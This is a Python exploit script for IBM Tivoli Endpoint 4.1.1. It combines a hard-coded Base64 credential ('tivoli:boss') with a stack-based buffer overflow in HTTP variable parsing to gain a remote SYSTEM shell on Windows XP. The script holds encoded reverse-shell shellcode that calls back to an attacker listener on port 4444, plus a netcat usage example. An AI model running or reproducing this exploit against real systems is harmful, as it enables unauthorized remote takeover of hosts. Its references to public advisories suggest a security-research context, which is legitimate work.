#!/usr/bin/python
# tiv-sys.py
# IBM Tivoli Endpoint 4.1.1 Remote SYSTEM Exploit
# Jeremy Brown [0xjbrown41-gmail-com]
# June 2011
#
# Discovered by: Brian Adeloye of Tenable Network Security
#
# This exploit makes use of two vulnerabilities:
#
# 1) Base64 authentication credentials hard-coded in lcfd.exe
# 2) Stack-based buffer overflow when parsing HTTP variable values
#
# Tested on Tivoli Endpoint 4.1.1-LCF-0048 running on Windows XP SP3
#
# $ python tiv-sys.py 192.168.0.188
# .....
# $ nc -v -l 4444
# Connection from 192.168.0.188 port 4444 [tcp/*] accepted
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Tivoli\lcf\dat\1>
#
# References:
#
# http://www.zerodayinitiative.com/advisories/ZDI-11-169/
# https://www-304.ibm.com/support/docview.wss?uid=swg21499146
#

import sys
import struct
import socket
import httplib
import urllib

port=9495

ret=0x7C96BF33 # jmp esp @ user32.dll
junk="B"*256

# windows/shell_reverse_tcp - 333 bytes
# http://www.metasploit.com
# Encoder: x86/countdown
# LHOST=192.168.0.198, LPORT=4444, ReverseConnectRetries=5, 
# EXITFUNC=thread, InitialAutoRunScript=, AutoRunScript=
payload=(
"\x2b\xc9\x66\xb9\x39\x01\xe8\xff\xff\xff\xff\xc1\x5e\x30"
"\x4c\x0e\x07\xe2\xfa\xfd\xea\x8a\x04\x05\x06\x67\x81\xec"
"\x3b\xd9\x68\x86\x5c\x3f\x9b\x43\x1e\x98\x46\x01\x9d\x65"
"\x30\x16\xad\x51\x3a\x2c\xe1\x2e\xe0\x8d\x1e\x42\x58\x27"
"\x0a\x07\xe9\xe6\x27\x2a\xeb\xcf\xde\x7d\x67\xba\x60\x23"
"\xbf\x77\x0a\x36\xe8\xb2\x7a\x43\xb9\xfd\x4a\x75\x41\x91"
"\x12\xc8\x0c\x5d\xcd\x1f\x68\x48\x99\xa8\x70\x04\xc5\x7b"
"\xdb\x50\x84\x62\xab\x64\x96\xfb\x99\x96\x57\x5a\x9b\x65"
"\xbe\x2a\x94\x62\x1f\x9b\x5f\x18\x42\x12\x8a\x31\xe1\x33"
"\x48\x6c\xbd\x09\xfb\x7d\x39\xf8\x2c\x69\x77\xa4\xf3\x7d"
"\xf1\x7a\xac\xf4\x3a\x5b\xa4\xda\xd9\xe2\xdd\xdf\xd7\x78"
"\x68\xd1\xd5\xd1\x07\x9f\x65\x09\xcd\xf9\xa1\xa1\x94\x95"
"\xfe\xe0\xeb\xab\xc5\xcf\xf4\xd1\xe9\xb9\xa7\x5e\x77\x1b"
"\x34\xa4\xa6\xa7\x81\x6d\xfe\xfb\xc4\x84\x2e\xc4\xb0\x4e"
"\x67\xe3\xe4\xe5\xe6\xf7\xe8\xf9\xea\xd3\x56\xb2\x61\x5f"
"\x3f\x14\x4b\x04\xac\x05\x6e\xc7\x0e\xa1\xc8\xcb\xdd\x91"
"\x47\x29\xba\xc1\x84\x84\xbc\x4c\x73\xa3\xb9\x26\x0f\xb3"
"\xbf\xb0\xba\xdf\x69\x02\xb5\xb4\xb3\xd4\x10\x8d\xfa\xb0"
"\xbc\x09\x11\x8b\x29\xab\xd4\xcd\xf3\xf2\x79\xb1\xd2\xe7"
"\x3e\xf9\xbe\xaf\xac\xab\xa8\xa9\x46\x57\x4c\x55\x52\x56"
"\x50\x6f\x71\xc5\x35\x8d\xf3\xd8\x87\xef\x5e\x47\x54\xec"
"\x24\x7d\x1e\x90\x05\x79\xe5\xce\xa7\xfd\x03\x35\x2a\x49"
"\x84\xb6\x99\xb8\xd9\xf2\x14\x2f\x56\x21\xac\xd6\xce\x5a"
"\x35\x8a\x75\x20\x46\x5a\x5c\x37\x6b\xc6\xef")

if len(sys.argv)<2:
     print "Usage: "+sys.argv[0]+" <target> [port]"
     sys.exit(0)

target=sys.argv[1]
if len(sys.argv)==3:
     port=int(sys.argv[2])

retaddr=struct.pack("<L",ret)

data=urllib.urlencode({"test":junk+retaddr+payload})
size=5+len(junk)+len(retaddr)+len(payload) # 'test=' = 5 (also works with just '=')
hdrs={"Host":"pw.n","Content-Length":size,"Authorization":"Basic dGl2b2xpOmJvc3M="} # tivoli:boss

conn=httplib.HTTPConnection(target,port)
conn.request("POST","/addr",data,hdrs)
conn.close()
